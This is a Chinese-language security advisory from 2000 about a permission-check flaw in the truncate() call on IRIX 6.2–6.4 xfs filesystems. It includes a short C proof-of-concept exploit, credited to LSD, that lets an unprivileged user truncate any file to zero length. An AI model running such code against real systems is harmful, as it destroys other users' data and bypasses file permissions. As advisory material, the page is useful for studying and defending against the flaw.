首页 -> 安全研究

安全研究

安全漏洞
IRIX xfs truncate()系统调用权限检查漏洞

发布日期:2000-08-10
更新日期:2000-08-10

受影响系统:

    SGI IRIX 6.4
    SGI IRIX 6.3
    SGI IRIX 6.2
不受影响系统:

描述:

使用xfs文件系统的某些版本的IRIX操作系统,其truncate()系统调用在截断文件之
前未能正确地检查文件权限,使得非特权用户有可能损害那些本来他们不可写的文
件。也许不只上面列出的版本存在该漏洞。


<*来源: LSD (contact@lsd-pl.net)  *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/*## copyright LAST STAGE OF DELIRIUM feb 1997 poland        *://lsd-pl.net/ #*/
/*## truncate                                                                #*/
/*   truncates any file on a xfs filesystem                                   */

main ( int argc, char * argv[] )
{
    printf( "copyright LAST STAGE OF DELIRIUM feb 1997 poland   //lsd-pl.net\n" );
    printf( "truncate for irix 6.2 6.3 6.4 IP:all\n\n" );
    if ( argc != 2 )
    {
        printf( "usage: %s file\n", argv[0] );
        exit( -1 );
    }
    if ( !truncate( argv[1], 0 ) )
    {
        printf( "file %s truncated\n", argv[1] );
    }
    else
    {
        perror( "error" );
    }
}


建议:

暂无



浏览次数:6002
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障